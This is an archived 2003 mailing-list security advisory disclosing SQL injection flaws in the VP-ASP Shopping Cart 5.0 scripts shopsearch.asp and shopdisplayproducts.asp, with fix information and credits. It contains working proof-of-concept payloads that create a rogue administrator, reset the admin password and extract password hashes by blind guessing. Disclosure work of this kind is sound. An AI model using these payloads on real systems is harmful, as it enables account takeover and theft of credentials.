lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3FCB3F09.4080803@s-quadra.com>
From: research at s-quadra.com (S-Quadra Security Research)
Subject: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection
 Vulnerabilities

        S-Quadra Advisory #2003-11-28

Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL 
Injection Vulnerabilities
Severity: Average
Vendor URL: http://www.vpasp.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt
Release date: 28 Nov 2003


 1. DESCRIPTION

Virtual Programming VP-ASP is a shopping cart application for e-commerce 
enabled sites.
It is written in ASP, supports the following databases: Access, MSSQL, 
MYSQL
on Windows and MYSQL on Unix.

VP-ASP suffers from SQL injection vulnerabilities, which may allow an 
attacker
in some cases to gain administrative access to the installed VP-ASP 
Shopping Cart software
or execute arbitrary commands on a target's system.

 2. DETAILS

 -- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script

An SQL Injection vulnerability has been found in the shopsearch.asp script.
User supplied input is not filtered before being used in a SQL query. 
Consequently,
query modification using malformed input is possible. Exploitation of 
the vulnerability
allows a remote attacker to insert a new user with administrative 
privileges.
A more sophisticated exploitation would allow a remote attacker to 
execute arbitrary commands
on a target's system (via MSSQL xp_cmdshell() function for example).

 -- PoC code 1:

 Platform: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account

Keyword=&category=5); insert into tbluser (fldusername) values 
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where 
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where 
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password

Keyword=&category=5); update tbluser set fldpassword='edsaqw' where 
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

 -- Vulnerability 2: SQL Injection vulnerability in 
'shopdisplayproducts.asp' script

An SQL Injection vulnerability has been found in the 
shopdisplayproducts.asp script.
Exploitation of the vulnerability will allow remote attacker to read any 
information from a database.

 -- PoC code 2:

Platform: Win32/MSSQL

http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

changing value at the end of request
        %20'a%25'--
        %20'b%25'--
        %20'c%25'--
        ...
and looking through the HTTP response from VP-ASP web server attacker 
can find the admin password.

 3. FIX INFORMATION

S-Quadra alerted VP-ASP development team to this issue on 28th November 
2003.
Security fixes from VP-ASP development team available at
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

 4. CREDITS

Nick Gudov <cipher@...uadra.com> is responsible for discovering
this issue.

 5. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assesment, web application security, source code review and 
third party product
vulnerability assesment, forensic support and reverse engineering.

Security is an art and our goal is to bring responsible and high quality
security service to the IT market, customized to meet the unique needs 
of each
individual client.

S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.
 
        S-Quadra Advisory #2003-11-28



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ